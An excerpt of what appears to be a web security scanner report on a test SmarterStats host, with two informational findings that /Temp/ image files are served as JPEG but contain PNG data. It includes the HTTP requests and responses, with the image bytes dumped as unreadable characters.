HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Mon, 11 Oct 2010 20:06:01 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB697FB9D99A80"
Content-Type: image/jpeg
Content-Length: 8986
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d..".IDATx^.].......h|. A..|..E..qD.y.PPD.d.A...
rN. .P..A..B....8...D|......JR....T~..........._.k....u.....}k.oV....{..f..`.rf.{9..O..0...`!. `.....`!.....f..`!..`.....`!.....f..`!..`.....`!.....f..`!..`.....`!.....f.. D].Xh.--~)...^.*.....d....d w!.b.....U.....Z$o..' V).oL.....3.1...E.P........N.?{..`....ZB.YP...?..E.Ht...)..a.ttt.............qa.8.r..s.......E....(........F?...R..!..!......Q..........L.../D1"T...&.;E[.$v..    .Y....f-..6..o...r......{..~..X)+R...."."...U....bd.X...r.".n.k....re.....j.R...../3...<X2...).v...B.....S..,8..e...e?.....q......1`.rkG..,Dn}o.:....c.X...Q....[...N9x.....).v...B.....S..,8..e...e?.....q......1`.rkG..,Dn}o.:....c.X...Q....[...N9x.....).v...B.....S..,8..e...e?.....q......1`.rkG..,Dn}o.:....c.X...Q....[...N9x.....).v...B.....S..,8..e...e?.....q......1`.rkG..,Dn}o.:....c.X...Q....[...N9x.....).v...B.....S..,8..e...e?.....q......1`.rkG..,Dn}o.:....c.X...Q....[...N9x.....).v...B.....S..,8..e...e?.....q......1`.rkG..,Dn}o.:....c.X...Q....[...N9x.....).v...B.....S..,8..e...e?.....q......1`.........P...X....~c.....1`...}........u.U.2..5..5t..Akm.....<X.=g.~.._..cW\.n~....'.._..'VH...j.9#Re,c{.....1`...6....././|.....|1...........Q,...P..m-...R.J.v......]uO....O..e!R....fm......1...... ...R.:."b..G .8.;E......0.D..t.E.l.`.:)......X......\.=..)..o....j....A....f...*.......R.    .......P....dC.,...j.....a.6(..,..0..p..._.a.....O.........~j
Q.H.u..-z....*!..O...$J5...XG.X.t..n.....4+.....c.\&v~.X...YR.>...lW......QM!.9UZ.*!..WE.`..2!..utt.......0....36.TLq...."Y..q...W....1|...../?...p...Id......X}iV..R...f(..2..M.%*........<..............v..2".(z.+$> .1.;...
..3V....'.."..P'fB;t".43._.......Li ..g.;.OT.."^...r....X.g.1.,0.vR3#.....OJv....:....y .}...|.Q..XF..p...)D[>......W..[.a..L...!2.9........j..X.?:.Y`....O^(^.fa.....1...DY`...`...H.p.z.....1..Z.s...l..!..g..g.(....,..s.    h.w.    k..T.8#Ra..-...E....[..{.^+v|. R..1R
.....`..k.....j
......B.=..g.<...d.a....d?;...(T..s...?..;lwY...rP......Mf1....l....=.b..{wz".h....$...U39\c0..fFTY.Q{I.\.....c.......1.3u......?6Ml...).?.OWS......<....npg...;n.-S..T0..._:3.F.~~._....=..6..YX. CJ....M..,D..90g!J'..u.'B.k..g.J!.~h}zCu,(.A;#.... "_..EM.2....c..L...wm.#.}5?..Hm~kizC.,DI....f.2gD..4h..(...^...u?...Gb..o....79(.A;#
_...9dB.Y]."3.l..<...\c........D!.....2....\..i
..53!]......`......a.h..../...[..x....M..~..".:....Q.|.........C.=..#...h..........1.NS...f..1....P......U.U.....%..}.2.'../57.<......\b..hY.....Ym
.~}."..bZ.<.0......}..|.P.....*..6O.=\b..SPO3#
...[<La$.g!r.-.e.....x..........X..=.x..e?.....9....D|..........g.~$.~.pby.......t...t.d/#2....,D.    F4Oy. ./M\b.g..yiP]!Z}.n)D.&M.p.A.O,D..eT.r.`)`....7.>.s.x.........W..f....f........R...3...`...B.zz.."X..{P.....W3.G9x..0.d.`.3..'...    ..u...W.~0....f...;L..Q..,B...T...3.'.-_..[L..R......W.....x.....v)..,
W.`..2.M..M..1./5Z..
...zv....v.I Y.l..Y......+.......y".@j.sCo....0`9t(D.N..6B...Bd#L...<...\a.X\(Z.^&~qvVj...W..~........ifDpI.......6(.OZ....C2S..O.wo..*B T3~9.h.+e?h
.6.....(.P..Xv\a..a.'0.<!.?..z.z......0...BF.4.........Z.,Dj|...<..x]a.w..............m......X."..Y.(.l...."C.-T.<...\`.6D[...T...Zp._....E.......^...|.........)..,z....V..'^8;3.<.    ....c..X..w..A.5*.....uLL.!.*.,....0...fF..4..    Y......d..L...........e......8...>bG...BT.....~.H.....l.%..?.pd..dU.2...V.Z.Dy.`.......\q........x..
|.......
...fA......(..*...(..w...........)..,z..`C...]!6q/..?9.h....X.......PlF..k.dBQQ.~b;.;..<Y....>.<......OIOy....'D.b.....,iv.B.....L...../Dr.~...%%....vtt.........P..q...._....{.......h.x>w.\....-...<.#{B.>._.!.wlB........n.y.&...tt........0`.K.k.!.K.4W.......f.C.!...G.E...em..sK:.m.:}H..)DA.R.6... U...I...GI.O@....p.k...."..!..m...yB4]&<....m.X.0v.B.iZ.......w...U...S..XL.1....?5Q.zB.-...y....nG.lc..DB%C!*eDZ..6a$...Q6<.;....e.6.`C..?N.*e.............P.J...[]z..s..lX.2 9............+...TI.@..{u..V .1`............sD.......sf......j......\fm......{...
.6.,w.;+B...i.vn..u,..&...P..X..1....T.!..G.7I!..?...z..6.....`(D<Gd..qmQ..,v.P..l.....3S.........e?.
Q...gD......<...c.2...d5...f....J.....Dg.;....2.x..K5.#R...
<.m.h..M?........$B ZK{...D61.3.m.NF$.2.........r.`Q2.(S...K1Y..xO.&)..;....9$.......4G.^i.J..=OV.sh......f.C...FO.T.....8......4Sf.a..".."..9....nf.C....3.=!R/.[...`.`..........(......e
.!.......p.V ....A...BT...V.....9#...........a...b.+......*.V_....M.X..v.Bdk.Xlw..X..9.]....b..!x....7j...W.3=.....]o.9".[.*..T..H..'......!.....3...^....h.V...^......0...co...)lm.......:g.kP..X..0.[.K./...]<.    .N.../.........b.-...4......}pf.....-.0.|...z.t.v.....V .0`9S.c!Ra+.[.....1T......y..;..};.
X..zP....E.".<].K<T.$..r.`.2.
S....-W.g=!.-.v...
.............B.|P..,.....\u..k=...].........,.....I....+...(..,j............X.    .n....Y.....@#..Y...e.r.s...y......v) .>.!.v.vY.~..
|..\..BF....9"....<X...gj..[...=}.x.."..B..<Bv......".........x.4..<u...Hu+..~0..........1..s.......E.'.    ...:O.L..,D.n..8.6....Il.".Psggc.....e..&=3HL.........V 60..R.2..B.....J...8....B....kP..X...........^..P.qa!.x...>.w........U.U.A.r.W........u...b.'D.e......1...[h.0#.....]C..=......(....c.....U.K.'Bc...Qu..E'........a.............-...1~...[.P..aF..xm..Bd.I.v(..,*S.p.~.....?.c...a=G...(G.......$.62.......1.....V .......e.w."...............G....Y.........S..O....<!.m.L.....T9L1..K.VS..]..;.5ov.Q2~.Yx"<.+2..`.2g!R    .......    ........5...(3wP.
....'];M!..4..!"<I...t.k#F.@..YP...g`!R...-...El..|....{"4.J.Q..o...{.`..C....U..:..j.'. e.    ,D..a.....Ei.!.u....VD......)o.b......]!.sN...`....utt...........[.^+Ec...Y+...
.<.Y;..>w..J...(i..Gk.J.._...J...71.(..p.~......i.,8....o?.B..E...".p...B.O.LV...%t./...*....@Z...M0.+...t.X.    .......[..`...kGV..P..}h.-...uw>.(..,#&..6...Wz"4.ZYv.......X.....r`....R..4....rf..!x..........,.+.u18#5.0.....,D6X4k...."..p......CC<..n..[~....R,....L90d!r@.b...X.4N.u1.v.r....b.iO.,..V]............(...A9x......b.2...o.^Z..T.......X..^...r.`)if.....`...;6.P.
...X...)';......1L.0D..b/...a.....PZ.O..,D........R......3....B lS^.......X...)';.....Y1......5...b...Z_......B..M9.Q..,%..!X......SC.....RZ.O..,D........R....WL/;y.u..a....
|.~`!.....(....f../v...!.".e...H!..&1.e?..a<.........`...M=.rO.\....=.N.mG....X.P....r.`YiV...u........,.h..
|.~`!.....(....f..,v.o'"...D.O...\......"..s...<XZ..C..u....e.~.........".h...r.`)iF..O....cC<....2r........B..M9.Q..,%........<...!.e.wWn..Y(WP........Q..,+...V...........8..E.sP......9.P..,-.....M......;-w.x........X.0....r.`ii6.....{..'<!rY&........X...)'.....l.:..`....
.x..&.........e......*.lr.i....R.6Y..|.....K~ ..
l...|g.@...:Z..
.`......%...........?..
].Cjc.X.,.j.......>vEOq...xs.=...]-.............ADE.. ..W..T....u._...`U0 (.j.Bd.N..e.<p)..x.^w.(|8X<.......5b....`......K.d...;.XA...1......aNm...{..o|U..H..9..1.n.p.<.gN B...6q.Ly...x.dp    .r.....][...'.eSp..z.. ..L...A.'.z,D..eT.e..........$..uu...}....g......\b.....`W..o.K.3.o....F.....X...d...
.U.
.......FY.....o.xU..;_...7..o?.dU........*~8(.!..`..a1..c^.)...<...3.aN.Y....,B._,...F,..Z.2...b.7.......O..L0...:.*.......D:,q..p._,.`i.*.&.#W.0u....u\..2^.r.9..6..U...B4j..2.!ha..s.A.J...Q..z......9.7>#V.j..b...........;eG..8.P. .9..9$..0.............y..d...w...[/.0....f.Q...b..._z.W.Nu..l...2....'...9.3..2...."p..C...-=<......+d...W..N{..5.3(i.n.74..Jlx.'8.....f..w.Pi.....z....b..s.....3...............
.........z....3..../....8.....7......<.|A.38A.3............0M.v..:p.../...../..J..4[....CNT[...'.k.o..1
..../....=...ME..B..}<X.e.......5..(.;..)..u{...2dP.D#.............`.@0L.q.......b....~.@.P...C..Z.eq^[..?f....S XA0`P.........O.#C.>.5..n..>t....2.....'..2&.G...2...$..s....X...3..+.....b
..w...|A.....>..A6.B.@..YWC
QW. ZZZd)...f}...L.
.4.v]!......m.Ha......    b..H.O..Pga..L.S'.]......>........(l....v..w.pi.8a.h...%....($f. p`g.C...g ..S...C@......Lr.s7x...E.WGd{a1.~.....X......7.Z5.i.e.y.    QWQ.Z.D.D.%.....E D.}<..s...9.W.....{^.]#.Sw......w..Y^.Y..3NX......k.'..........,....'....Gb..e..3<y....k..e>!3./k..pB..P8...........qa.,....`.K....C`.O}.W.<?z.jy.-..,..M.s.r..._#..(?.~?..~.F../#....6....Gq./D.7....R.<r.....-.9%.{............w........:...?.x[............e..mb...\.....b`..}.!D.K3..D.@L..`.4<H..7G$".......d...GiD.f/.....1h:.r5.~h<!.{e
..-...c.....4..9...d.....`!..|>53......q$0..@.........3..4...r.`i.8.......9...&....U..$...yF.8j:.*...Z...W.A...-<a?..Y,.H.c..R...?......}...04....p(.`8...@-$.un.{.Rhk.m.EiP.[.V(...U9:....(}}\.7.....C.q..l....N..    ..1...r...?.`....b.........2.....A8#.|/.Y...Y.7y.AEOx*.............s..3 .<.oT......?j~..O..h1.X
/./...'D1_..14.......8..j.YIU".&.......~.....U..I.D...4-...^.G.Opi.xiV7#..).....(.S..AjFD.....2..!.<i];}....S..W2..,.Mr*Dr..........~.
.]<....?...H..8~..D.-q.du.y..\Wh.+o.."#J....F..pH.|.
.....Z+cw...b(.;.....(.)M......t....Yn.....<W9.......RE........... .....%...(2.^..W.G...M.G.."~..V..'......A.....O.{..}yN..b..He2>/....U..o..k.4.T........ .B$.=.o..D?.~.1S...k.......j..c9[.6~.Wg.m.c.5....i.9.8I..1..@w`...;x.10....Q.;....t..X......3.....5.....@w`...;x.10....Q.;....t..X......3.....5.....@w`...;x.10....Q.;....t..X......3.....5.....@w`...-p.KQ.NY....IEND.B`.

10.53. http://vulnerable.smarterstats.6.0.host:9999/Temp/e13bc484ceca45bb97f15bfcc30a6c03.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/e13bc484ceca45bb97f15bfcc30a6c03.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/e13bc484ceca45bb97f15bfcc30a6c03.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:32:08 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682BB7662C00"
Content-Type: image/jpeg
Content-Length: 6349
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...bIDATx^....,...q.9..#.9.8g..........0>.....06.s.\\p..s...#..zzF...n...:.W....H...Z.^R+\e.C.....Y..F...S.*@..A.F@....
.D...>............+@...
..T.
.Dl.T.
...A4.+..P.*@..P.*0........@....@.-.f.9.....j.m]l[.X,M.u6.*@..Q`Z ..f..S....1%...X....biR...?K..T.*0!..@Sl. r.M..5.x..I...@...x
L.D{p..Ad...$;...M...~ggg...+..|.A........@B.x..G..6..n..../.32.B...r.8.....W..#{.9t.Q..L.D..r50.......D.N5...^.e.u..f. .5...U.p>7.U.`u.&...=w.D......{zm..\.M.D.......8...r.........Qz3$..5.vgRK......z..-..g.......t.....k..(.f3...._.&=J.... ..R=A...#.I.#...!s.D...D...D...VC..;.A...AD..D2...".d...-G.R..t.H..Ss.!"..O.2CX.VU.)7vI..T.).. :.:.."s.'.i.l..)7vI..T.).E..$oufy....[... :4.);o.;M....""..Y... ".R!..... Z.......AD..D...yg.5{...D8#..".+1"....w> ......".H.J..F.9....7.h..A.q%.H..A...AD.i\. ..7k.}.B.g..A.q%.H...At.M... ".4.D.i..5.n. ..AD.i\. ..7k..`A.3.. ...A.Q. ... ".4.D.i..5..k!.3.. ...A.Qo. ..w...AD.i\. ..7k.}...g..A.q%.H...A.-."..D.....".zs..}.B@#..".+.D..f..-.pF..D.W".4...D+."..D.....".zs....B@#..".+.D..f.oZ... ".4.4k..oVf.*m]l.:l.u..P.X...M.g.1.... ..AD.]L..o.j]..?.\...x.m..^mLy.}p.N..4..}....l@t.....AD.]L..j}n6..D..iFG...O.4....'....$,O/.......5..).UW..M.&.EN.2>.~biR...D_......1"J..N.I........Dc......H.2.Wd...Q|.j..S.3.m.mR.yM.Dew.E>..u.].
D.%...4BIY,'].)k6    .U.    #"...,....}.`.:H.....s.........5.u3...g.. ..f....8P.'x...k...J...gJ.{...V...c.F..D=\6.D..IDD.Jo.b.Y_.._....Na*I#L/%O...kI..r]. ...n.P.i4>nI...<v@..=...o....*..f=}.../C...#".?I...Q8n....Ti..Z..+?.4.Y. J.}    j..A....@T....Q}.YS.q..A.#."..A.E."..D....F.Q8P.[..&....a.f....U.......(..e!.4.. ..%.)G......W...X..,../X... ".4.9.....]1....Ey5..k!..8.>oA.3.. ...v......x..h..L$..D.. .Y.Dw}....D....G.....\+.
&.j*5f^=.n. .Y.D.. ..AD.i.n4.......i*4v^5.......3.h..p..8o..(CZ..<"...5....o.Z.D...1@cD.L.-.DmcD..^S.=.....w..;.>..O[... ".4~(..2"j...vX.....y. ..G......S.D8#.."...."..F....
..W.".y..l.(....1@#.."......<.......^^=.p.....    .e.B:...1.@..!.. ]3..O1..D.c....q.}.FD8cD.L.-.D..!.5..Qd'.)..... .........Z."..D...]%.SFD........V;.LS.q..A.<}...J.-....L.wH..Z...J..[.. .Q...!..>    .;>n....-.x..Q{DT..H....QGD..c............".H....)#"....Q.    !_.. ..(h. ....".h. .<....AT..W......Qc.F..D...)".<....A.?......?>.5.. .xfF.U...    ....rO"n..........>lA.3.. .    .4.9.....x..;@1
..[... ".4^.1".<.|..Ad....gq.}...g..A.... ..d....Mx5.2.7.....B. ".f...1.O...@_.".Yc...hD.7."..D...@.<.~.}....\.u...8..6..
.K.z.)..D.#~.qAq.}...g..A4_..........F.Q...v]>...>.V-].X...-..A.;........-.pF..D3.Q:..+{...T3:jFE.4....#...........B@#.....(.R...NV2X<...q...XT,M..a@.;........,.pF..D3..@_.j.)...........q]....H.yg........|._._....r$.0...,A.T.......I...K5....dwJG4"..=.....#".Wg.G.y...-...j.#;?...^.b..x..;.. Z& \.$....9...e.....p.H.N..u...|}.....}..8A._..'k.S:. z...p..h..#.R..#..(.>....A....m....m.2.h..A..,    ........2..1...p.....    .e.B..I.....eH....7...(..>..^Q.........2..`.q... ..t..8..aA.3.. .DBU.    .....y.)..;...@.....D8#......c.k.._..y~    ".>..^Q...m... ".f.".#O;...Y...=4..r."..".g..5;.g....V...}..
6......g..A43....kU[!.;k...3?zZ."...n+.(....c.F..D3.Q.h......|.2..j..wMt;0.A.f."..D...e|...f.<...._..-=4..+..D.]....q.]cA.3.. .... *..h...3..?..V.z..vMt;0.D...4.H.....eH...G$y...Q...Y...,
..o2.h...    <.h>..=..D...Rzh\~#..".H.....#.pK..q...t.^..D.....g... .8......<K.rr.1R.,..,.O.v*...L$..D.=..~Cq...FD8cD..H....)#...}...*..W"..An..(...zc.F..D....D.Yc..c[.jj7B^=......,...Y... ".4.6.........z<.ZS....A....m.A.-...q.T..."..i].]3.c.'..D..9.6.q...FD8cD.L..D.aO.I. ..*.C....F..D....O.....a..9.......nE.[]...."....+q*...('G...f...=|.28.l@j..W....Q...5.....#"    L.<..    #........
.....nE.[]....-.pF..D.O..D.^..&..D...nu=A.L@H.3...."..i]...A...r...Q}9.....-.x..Q.........j...(.b..D...AD.I"....4.9..z.....d...._aA.3.. .x.$..v.4.9......,..F..D./].....z...fd]l[...I...|.\....F#......g..At.AT.M...6?)2E .&.z........-j...e.D8#....
.*...Or.M..5wb...^.....v.... ..K...AD.]P.U.>".K.Y5....i.&.z..ggg~g..\WbC..k>./../.......#k+K.-.d.....D.....p..[....^lA.3FD..RA.._.`...f.e.n    G.D.....AD..D..`u.?v.RmP:H.z}...?...@...E.D8#..".(..n0.:..0p}.9..)..S..?.g.......B. "..8..W[..,.a.cD...n.t4"......AD.i<k.cD}.o?..Cc.p..p....H.-...V....-U..eH.2..f....^...'..    .q.=.FD8cD.L..D..b...A..d.&,FAt.y... ".4N%..#....A..h.|\. ....".. .(.....pn..'...~.\c.F..D.WbD.Q.%..D..=n.P.D.. ..AD.i\. ..7..~m.... Z& ._.R.....eH..1.!...s{.<.8..m#".1"Z&.."    V'.G.5.~Rw... .<....D....$.cD4dD..k.....P#..".H..8.:".d.f.-...D.W.......Yr......I.~G.5.._..W.8..a#".1"bD.q'    ..5..k..@v..Q...tc.F..D..F.p^uD..@v....2.!...6wI..Z...........i6"..#.e.. .`u.y.........<.j..A.q?    .........`t.kv.S...AD..D...y...p..F.A.d."..D......i.k....n.....D...t..R...!L.N..T.H>5.n.c7@....O2.h....<.....j.......#....1.8..hA....P..C.Ww....U\...m. ..D.q.7.....,.p......).......>...m. ..D....zEA........0.a....M)o....u..P.....AA......A4...\....o...A....N....F).......3.h....5.!RI...>.}.....n...........D8...S..].c.....5P.....!A..R\....p.r@...    ".I..}.z5.r.....m.6.........u................ ..(...}....y.@.-.z.1.^..).ks.Ej.e.D    .GC. ...._....@......\4.FA......hx@. z..b]@w.mM..._Z]..s.........*....<......Q.svvf...].|.\.t.F............:"2-
..DD)o"G99.puf9)o..6.n9.........C.=$kU..r....Wm....w.s....i..P 2...s.Y....5)...T U...".N...T1..
P.....D2...
P.!. ..T....T....Q/...
P.!. ..T....T....Q/....7......(#../{...F......$,....nr.....k..S.D.......F.7u`e:a.....Q.2..4p]XN..&....p"#A4...=c.y...."&...(w.Au.(G..N,..R.M..r..... .H..m..H\TT..P.\....8.._..e.a..........R....... .H....e$.....'.r.Q.a..^p..W...h..k.C..A4........L    .^]&m.}..,..E..6iu.Q...B.(nu....z../Cq..=..V....q}.,g.D(....-G;..]....m...Y.e...`u5.b.....we.(c.T.......T.6./.Sk.h.!....~T.
$+@.%K..T.
.. ....~T.
$+@.%K..T.
.. ...v./.1[8..u.Z.#wm...*.u#@].l...,.r....lt]..t....RV(.~jeT.......&..jv.+v..s.......N..uv........o..h9..o..+._?|.s.......s.3....,..Sk....ng.2...e#.....].s.t{i..c..".T....r.W..4...F.a.}..~.E..RF......<VF.:*...J...K..u.Z..k..T....8F.O...T.....+.].....a.M.n].&eri
Xk......u...(..D.}.K.4.Q..PI:../.\u/..I@T... ..6.b.`..P.S
'.i...w._g.V...o_..VB....}...,...q...k.RLq....f0.TX.n.....T.[..C,..........t].^]....]y}.
.]....3"...*Mm..0.T.O.....).V.@D.;#......d..~.D
.......w    k.:.J....    .u..we...MK@....N.~....NLL...o.hv7F.
...<#..A..dQ.>..{.f...._5.X}.......m.jg.n@.!.......)@..dc&*@..
.DH5y/*@.D
.D"...
P.....RM..
P.....H6f..T...A.T....T@..A$......@*@.!.......)@..dc&*@..
.DH5y/*@.D
.D"...
P.....RM..
P.....J.!%..6d....IEND.B`.

10.54. http://vulnerable.smarterstats.6.0.host:9999/Temp/e7d9eb9eadc04c58b59155ff298566e3.jpg  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://vulnerable.smarterstats.6.0.host:9999
Path:   /Temp/e7d9eb9eadc04c58b59155ff298566e3.jpg

Issue detail

The response contains the following Content-type statement:The response states that it contains a JPEG image. However, it actually appears to contain a PNG image.

Request

GET /Temp/e7d9eb9eadc04c58b59155ff298566e3.jpg HTTP/1.1
Host: vulnerable.smarterstats.6.0.host:9999
Proxy-Connection: keep-alive
Referer: http://vulnerable.smarterstats.6.0.host:9999/Client/frmViewOverviewReport.aspx?reportID=OVERVIEW_Workspace
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.3 (KHTML, like Gecko) Chrome/6.0.472.63 Safari/534.3
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=ijbzrxuei0fhzn5qh4jllhd4; STHashCookie={"CountsGuid":"1647212677","TopBarSection":"AdminManage"}; SelectedLanguage=; STTTState=

Response

HTTP/2.0 200 OK
Server: SmarterTools/2.0.3932.23369
Date: Sun, 10 Oct 2010 03:37:44 GMT
X-AspNet-Version: 4.0.30319
Cache-Control: public
ETag: W/"1CB682C7F131D80"
Content-Type: image/jpeg
Content-Length: 7369
Connection: Close

.PNG
.
...IHDR...".........L.......sRGB.........gAMA......a....    pHYs..........o.d...^IDATx^..Y.5IQ.....TD....E.'D.#"...8 ....y...l;...p......>.b7*t..]...Pf..Y.j..<.U..5..[+.......Q.OEFfE=..., ....[....K., ....@.I ....[@ Z....d.Y@ ....d..- .-~.t..., .i..............Y@...4.d.Y`q..D...]., ...D......n..<..n.nN.....U+...t.e.Y`..X    .....,# zt.\..E..........h..P...X..b$d0:...4.7..,..GA...wT...6h...(Z.>.:...A...-.....6O=.T+O?.t.../Kd.....x..W.Q.^......i3@. .[.`..c.c....=......7el..Q?!....'.].    D~h.2..jg..;....r.V...../...j[......T.....    6U;S..Q..o......].......@ .....d.o. ..v....S&.T.L]lG...i..H....m..V....z.....].p`...<s,;w|.........=....    Ds,~..)7`..=....<.g...."..Ds.2.[ED~Fe.......V.;>.........n.\.........go..A."...Z.V *4TA3&.<t.5...>...B..@T...M..Z...{...j<t...s...D?.......r.......vSn@A..&{..16T.e....._...2w|S..@4...5s....)...b......B.@...Z.......W....G...^..O..!d....;ED..Q.n.(.VK..F.=..%.. ...    ...""?.2A....j..\...:@.!.....................Z.).>.].Pk..x.;..O..!..At.f..`~[..X...f.".....z...j<t.A.<.......".
.\..8mOE.U......Z
...8[.9.3..<.d.~"..!.
.8=......W6.^......    ........1s(.........".%?'t..G    ....D.9H....P(...'$.... ...".X.s..........h..:.MK3-.J'9*.......L....!D.Q?"....D..,.fu.Sz.c..<t..(9.....5.h..B.....nN[..-.S.|m.k.........W........AT2...(Y]o../<..........""..%...    .B.@T:K+.    D..z....J..C.*....../..t&...@.w#<.Pz5..Py.,.H.~.5..?...ED.....@Ta..FD..
.....1].. B.@..3]O...Q=.......Z.."".._.Q.LZI;...Fx...j<t-.".+.6..... ...t.V...*....."......iU!Vt...a.=...M:....G.PsL}..P    ...P.\...>."".("...... B|.w....{8k...fL}..Py...X.\.5|...D..;7..;ED.x...5~.....).y,j@.Qr b.ra....B...j...m="".....l6...6.".+..Q!...L ....p(...]....G.ED.W...~.._......{..Y....Fu...vSnx..~{.>.].<.Z@...D..p....?..Z.x.........p...L}..P....X.......>/.D....
....jV'.>.Q.K3...5P`.l...
".+.......!r. ./.......h7.Y...F...V}.cC.Qr...CN.[..    D53....Tl.6uI...Z...U...<#.=......<t../9.....5|.o_...FD...@.Y<.n
..Q..9..b........l..(,_.%....1[~o..B<.f.....h.,...    -.4c.?T{......M..,]fK..%...N:.5 d}*"J......$......0......@...SW...CD.-9..N:.5|... "..}.l-............q..,]...y....{...r. .]....HV..D...6.Y.".........S.f..Y..Q.[.Zy..]n..5..l..g.. .@...%.".!.....7/4.....S...D............. ....h..|..5|w..B..2.T......~....Q....Mp..86..%.".i.TD....).U!....A.|..&...&SW...CD.-9.y..Y)...._h."........X...#...u`sl9......G....Kg.....).U!.....P.eS.zX.JtV..M..,]ql..K.D.]:...
.@.@T...V[..;j`...    ...A....yK.D.;t._ji.....!.Q.b..{..ul...D}.sR6.Y.:...(9....v..Y..Q.[.Zy..ul?:...4Q...;KW..s.b....{.4.".U!....A...X.6m..t-."..C..{.2.. .Q.[.Zy..ul..PH_...X.6m..t..!./...+9n....!..DU.)k.."..}6..>..M..,]ql....O ..!.....7..o.G.......+.E.U...^......r.....R b..2Ge..@D\.....v.......l0"...J....$.;t.\@\s{}..,J..O......>;B...k,[).a..cc.]Pg{R....".l.D7.....h../.]7.!.Z.B#.6p.....X.6m.,]...w..!d. ./...h.n.o.y,..@.
...>...Ut.c...y..F....W.t..>.9..:.,]..l.Z..l.J....]...!f....k...9.Z....%a......l|..?..:'e...+...ti...g{RK.o. B..#.a..^.....}-..h.s....K3.!..D.}....rKA.......hK....w..!dC ._f.eSB.Ds5..?H.._.x>.D.....E@.X....J..5.......!.ua...'...q...=..l|.......I..g..cc.]P..SK.o..B..A41.!..c..uH....u<.&8KW..s..L.....B@.....bn(.D;l./...D.e$..\x..eR./..YU.....q.b6f%.M.;.........K.~...KI........8KW.."j.A....k..."..D.|)n.."v)    ..J.....,].D.....dADJ..Dg.@.kVL.LC......].M0v...tq*.......|......k.......#"..f..
}x..uH-:..YY..l..tE[2....:.lO
..Q....F.w..."...lge.O0.b.Z
D.....[BD..FD.w..`......E.......[N..'.5.tE["...-. ...".l.D...v...w...[.......c...,]ql........7..!D . ..D..!.....a.
..g.Z
D.......D......@#.D.sK,8,."f...ROEDo...".l.D.....GD......g.!F..    6.Y.... b...... .....#...........'..g..ccF...=....!.sC ....*'...U{lK.......g.a.!.c.
..g.Z
D......... .!.E......p...Y[w..........d.`...w....S..+..5.v<YKA.(...kU_.......jS..~.
......4I..tE.!.....m!"B..#.1*.e..2 ....X<..4+.Y.]<.Qn.nv..;..;jWp..;KW,...Q...rRc.|.....$57k
...j......[..?O....f.!...o..d5.lH|...5.K....    ...m...P;Y............#.Z.%.`.g.B.j...kK6:..YY..6.Y.:.."...Y9)..[....!..v..E.O.Q..~"..... b;+...Mp..."f..J ."..>.@....v.8.}........Y[..y...X.x..,].........B.@4.W..yDD.-..<lg..`h....,].........2]_.....H j.....d....+...1..XK..D..O..D+..jK6..D..H.c.a    .1#.6..6..!..JA..    .Oq...>V2.&8KW.."j..hd%....&..!..@......J...X."........lAt.@...h. B..M-....J...g.. bF...r*....B...V
".NHt.....-.".....)..%..!..JA..    Y
D.d.Mp..hK6.XKA..[. .. ..@......J...X."....*.....*@.!..JA..    ...vVV..&8KW."b.`.cE`...!.S Z).X;!.y............g..+..B.....}(....>TM...i...+......Mji..."..D    ../..J.._ze% .`..X.x..,]..tH    Dc j.........zH..../..A.vV...6.Y."....*o......>. D ...#hn.E........W.pVV.......(8...%.#b-......>..3.u.9Vg..Q...J/yDD..dt....r`6.Y..-......)@.!.Q.&....2...w.|.Y.T.v.......c..Y.b.|..R.D-..l... .....P.X..}'........    ...i.<..K3..U..(g..8S.SW..P...%
|c;._. ..ED)6.".%jV...._.d..l..tE.1....I%..c.>.......1J...c.....+......b..    .....X9..........|Wwmo. B..S.=.YYKO...."........]....."...D........,0Dge-=..l...b..Z.! d}
D+..+...C..Zz..g..cC8k.!...........@.R....l0..-."..
DyG....?.....H..G.....``..X...Y..-. bE`f.7....QD.E.^?. b..;..sR..'s{;..a..-....>../     B.@.R.....yX`..XKO..,]qlLGE.mR.j...O.H j'.{)...........././.....sB........Oq.R...&8KW......[r b........"...D.u.R b-=m..tE[2....IED..Y...JA.
..:....l..t-.".R.l.E...D......M............S.[....%.Ys..QJ.._.@...h. b...:..Zz2w..-...F)ai.-.....]Z..c..P....=.x>+.^....`\.yX....`.....~...!..z..|..-.,..@.|V.....V..L.F[2......L.bl..@...N_.X.B.w.m............5.......%g.....[R....b.Q
D.... b..g=.../..jkI...K..fA.X..@.....B..1..b.?'4."...(..
...5......|g....Q...%
|c.D...4..x~.Fg..Zbi.X..i......
3...K.....K.]...h D....j.y....&&...:...QO..K^.Y.s.._r...C. b:...
._ ..@.........P......{6....K.j.'..0.........B...........XO...g....&8KW.%.Q[.."......).............(..K..k.cyK..C.!....W..."........X...v...t.@DtT..7.....>'.!.Q1^..n.D.....`.. b:.90K..zM..B..r......3.E.....`G.LG....?... .Q1^..z....[*...m.t!/.>;8.......]...b.Q9_.[z.h.OU....1..!.5.".>..W.."D *.KyC...&Wt.6.X.Py.......C*Y.._
